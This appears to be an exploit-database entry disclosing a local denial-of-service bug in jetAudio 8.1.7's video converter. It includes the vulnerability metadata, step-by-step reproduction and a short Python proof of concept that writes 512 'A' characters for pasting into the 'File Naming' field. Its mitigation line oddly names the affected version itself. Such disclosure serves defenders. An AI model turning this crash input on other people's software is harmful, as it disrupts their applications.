Convert Video jetAudio 8.1.7 - Denial of Service (PoC)

vendor:

jetaudio

by:

Alejandra Sánchez

7.8

CVSS

HIGH

Denial of Service

N/A

CWE

Product Name: jetaudio

Affected Version From: 8.1.7

Affected Version To: 8.1.7

Patch Exists: YES

Related CWE: N/A

CPE: a:jetaudio:jetaudio:8.1.7

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows 10

2019

Convert Video jetAudio 8.1.7 – Denial of Service (PoC)

A denial of service vulnerability exists in jetAudio 8.1.7 when a maliciously crafted file is used as input. An attacker can leverage this vulnerability to crash the application. To exploit this vulnerability, an attacker must create a file with 512 'A' characters, copy the contents of the file to the clipboard, open JetVidCnv.exe or Video Converter, click on the 'Add Files...' button and select a video file, paste the clipboard in the field 'File Naming' and click on the 'Preview' button, which will cause the application to crash.

Mitigation:

Upgrade to the latest version of jetAudio 8.1.7 or later.

Source

Exploit-DB raw data:

# -*- coding: utf-8 -*-
# Exploit Title: Convert Video jetAudio 8.1.7 - Denial of Service (PoC)
# Date: 08/05/2019
# Author: Alejandra Sánchez
# Vendor Homepage: http://www.jetaudio.com/
# Software Link http://www.jetaudio.com/download/5fc01426-741d-41b8-a120-d890330ec672/jetAudio/JAD8107_BASIC.exe
# Version: 8.1.7 
# Tested on: Windows 10

# Proof of Concept:
# 1.- Run the python script "ConvertVideo.py", it will create a new file "ConvertVideo.txt"
# 2.- Copy the text from the generated ConvertVideo.txt file to clipboard
# 3.- Open JetVidCnv.exe or Video Converter
# 4.- Click on the 'Add Files...' button and select a video file
# 5.- Paste clipboard in in the field "File Naming"
# 6.- Click on the 'Preview' button
# 7.- Crashed

buffer = "\x41" * 512
f = open ("ConvertVideo.txt", "w")
f.write(buffer)
f.close()